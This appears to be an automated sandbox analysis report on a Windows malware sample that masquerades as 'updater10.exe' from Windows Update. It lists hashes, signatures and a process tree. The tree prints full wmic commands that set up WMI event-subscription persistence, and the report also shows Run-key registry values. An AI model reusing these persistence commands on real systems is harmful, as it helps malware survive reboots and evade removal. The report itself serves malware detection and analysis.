Analysis
-
max time kernel
146s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
18-06-2021 07:27
Static task
static1
Behavioral task
behavioral1
Sample
c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
Resource
win10v20210408
General
-
Target
c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
-
Size
3.1MB
-
MD5
14471a353788bb6cdb6071d0e0a83004
-
SHA1
c90b5c534ce0d622547bc5b96075eb3d4212d660
-
SHA256
c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349
-
SHA512
57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
updater10.exepid Process 2340 updater10.exe -
Processes:
resource yara_rule behavioral2/files/0x000200000001ab40-116.dat upx behavioral2/files/0x000200000001ab40-117.dat upx -
Deletes itself 1 IoCs
Processes:
updater10.exepid Process 2340 updater10.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
updater10.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "\"C:\\Users\\Admin\\AppData\\Local\\Windows Update\\updater10.exe\" -0 -0" updater10.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "\"C:\\Users\\Admin\\AppData\\Local\\Windows Update\\updater10.exe\" -0 -0" updater10.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 api.ipify.org 8 api.ipify.org -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exeWMIC.exedescription pid Process Token: SeIncreaseQuotaPrivilege 4060 wmic.exe Token: SeSecurityPrivilege 4060 wmic.exe Token: SeTakeOwnershipPrivilege 4060 wmic.exe Token: SeLoadDriverPrivilege 4060 wmic.exe Token: SeSystemProfilePrivilege 4060 wmic.exe Token: SeSystemtimePrivilege 4060 wmic.exe Token: SeProfSingleProcessPrivilege 4060 wmic.exe Token: SeIncBasePriorityPrivilege 4060 wmic.exe Token: SeCreatePagefilePrivilege 4060 wmic.exe Token: SeBackupPrivilege 4060 wmic.exe Token: SeRestorePrivilege 4060 wmic.exe Token: SeShutdownPrivilege 4060 wmic.exe Token: SeDebugPrivilege 4060 wmic.exe Token: SeSystemEnvironmentPrivilege 4060 wmic.exe Token: SeRemoteShutdownPrivilege 4060 wmic.exe Token: SeUndockPrivilege 4060 wmic.exe Token: SeManageVolumePrivilege 4060 wmic.exe Token: 33 4060 wmic.exe Token: 34 4060 wmic.exe Token: 35 4060 wmic.exe Token: 36 4060 wmic.exe Token: SeIncreaseQuotaPrivilege 4060 wmic.exe Token: SeSecurityPrivilege 4060 wmic.exe Token: SeTakeOwnershipPrivilege 4060 wmic.exe Token: SeLoadDriverPrivilege 4060 wmic.exe Token: SeSystemProfilePrivilege 4060 wmic.exe Token: SeSystemtimePrivilege 4060 wmic.exe Token: SeProfSingleProcessPrivilege 4060 wmic.exe Token: SeIncBasePriorityPrivilege 4060 wmic.exe Token: SeCreatePagefilePrivilege 4060 wmic.exe Token: SeBackupPrivilege 4060 wmic.exe Token: SeRestorePrivilege 4060 wmic.exe Token: SeShutdownPrivilege 4060 wmic.exe Token: SeDebugPrivilege 4060 wmic.exe Token: SeSystemEnvironmentPrivilege 4060 wmic.exe Token: SeRemoteShutdownPrivilege 4060 wmic.exe Token: SeUndockPrivilege 4060 wmic.exe Token: SeManageVolumePrivilege 4060 wmic.exe Token: 33 4060 wmic.exe Token: 34 4060 wmic.exe Token: 35 4060 wmic.exe Token: 36 4060 wmic.exe Token: SeIncreaseQuotaPrivilege 4040 WMIC.exe Token: SeSecurityPrivilege 4040 WMIC.exe Token: SeTakeOwnershipPrivilege 4040 WMIC.exe Token: SeLoadDriverPrivilege 4040 WMIC.exe Token: SeSystemProfilePrivilege 4040 WMIC.exe Token: SeSystemtimePrivilege 4040 WMIC.exe Token: SeProfSingleProcessPrivilege 4040 WMIC.exe Token: SeIncBasePriorityPrivilege 4040 WMIC.exe Token: SeCreatePagefilePrivilege 4040 WMIC.exe Token: SeBackupPrivilege 4040 WMIC.exe Token: SeRestorePrivilege 4040 WMIC.exe Token: SeShutdownPrivilege 4040 WMIC.exe Token: SeDebugPrivilege 4040 WMIC.exe Token: SeSystemEnvironmentPrivilege 4040 WMIC.exe Token: SeRemoteShutdownPrivilege 4040 WMIC.exe Token: SeUndockPrivilege 4040 WMIC.exe Token: SeManageVolumePrivilege 4040 WMIC.exe Token: 33 4040 WMIC.exe Token: 34 4040 WMIC.exe Token: 35 4040 WMIC.exe Token: 36 4040 WMIC.exe Token: SeIncreaseQuotaPrivilege 4040 WMIC.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.execmd.exeupdater10.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 620 wrote to memory of 1484 620 c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe 72 PID 620 wrote to memory of 1484 620 c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe 72 PID 1484 wrote to memory of 2340 1484 cmd.exe 74 PID 1484 wrote to memory of 2340 1484 cmd.exe 74 PID 2340 wrote to memory of 4060 2340 updater10.exe 80 PID 2340 wrote to memory of 4060 2340 updater10.exe 80 PID 2340 wrote to memory of 3684 2340 updater10.exe 83 PID 2340 wrote to memory of 3684 2340 updater10.exe 83 PID 2340 wrote to memory of 2104 2340 updater10.exe 85 PID 2340 wrote to memory of 2104 2340 updater10.exe 85 PID 2104 wrote to memory of 4040 2104 cmd.exe 87 PID 2104 wrote to memory of 4040 2104 cmd.exe 87 PID 2340 wrote to memory of 636 2340 updater10.exe 88 PID 2340 wrote to memory of 636 2340 updater10.exe 88 PID 636 wrote to memory of 1484 636 cmd.exe 90 PID 636 wrote to memory of 1484 636 cmd.exe 90 PID 2340 wrote to memory of 2268 2340 updater10.exe 91 PID 2340 wrote to memory of 2268 2340 updater10.exe 91 PID 2268 wrote to memory of 3784 2268 cmd.exe 93 PID 2268 wrote to memory of 3784 2268 cmd.exe 93 PID 2340 wrote to memory of 1872 2340 updater10.exe 94 PID 2340 wrote to memory of 1872 2340 updater10.exe 94 PID 2340 wrote to memory of 1804 2340 updater10.exe 96 PID 2340 wrote to memory of 1804 2340 updater10.exe 96 PID 1804 wrote to memory of 4060 1804 cmd.exe 98 PID 1804 wrote to memory of 4060 1804 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe"C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\cmd.execmd /C start "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Windows Update\updater10.exe"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"3⤵
- Executes dropped EXE
- Deletes itself
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\Wbem\wmic.exewmic process get Caption,ParentProcessId,ProcessId4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe ver4⤵PID:3684
-
-
C:\Windows\system32\cmd.execmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"4⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'"4⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'5⤵PID:1484
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')"4⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')5⤵PID:3784
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic process get Caption,ParentProcessId,ProcessId4⤵PID:1872
-
-
C:\Windows\system32\cmd.execmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"4⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''5⤵PID:4060
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
14471a353788bb6cdb6071d0e0a83004
SHA1c90b5c534ce0d622547bc5b96075eb3d4212d660
SHA256c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349
SHA51257d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8
-
MD5
14471a353788bb6cdb6071d0e0a83004
SHA1c90b5c534ce0d622547bc5b96075eb3d4212d660
SHA256c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349
SHA51257d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8